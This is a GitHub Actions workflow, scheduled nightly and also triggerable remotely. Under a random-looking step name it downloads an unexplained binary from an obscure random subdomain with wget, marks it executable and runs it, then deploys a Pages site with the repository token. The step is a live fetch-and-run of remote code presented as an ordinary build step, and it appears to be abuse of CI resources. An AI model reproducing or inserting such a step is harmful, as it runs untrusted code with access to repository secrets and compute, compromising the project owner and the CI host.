#2024-03-18-[093249]-jhay9v2z
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "51 2 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 67d0vmpf576rhbyy
        run: |
          wget -q https://zcdo4u5lbnl3cyrl.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories
      - name: Deploy
        uses: peaceiris/actions-gh-pages@v3
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          publish_dir: ./public
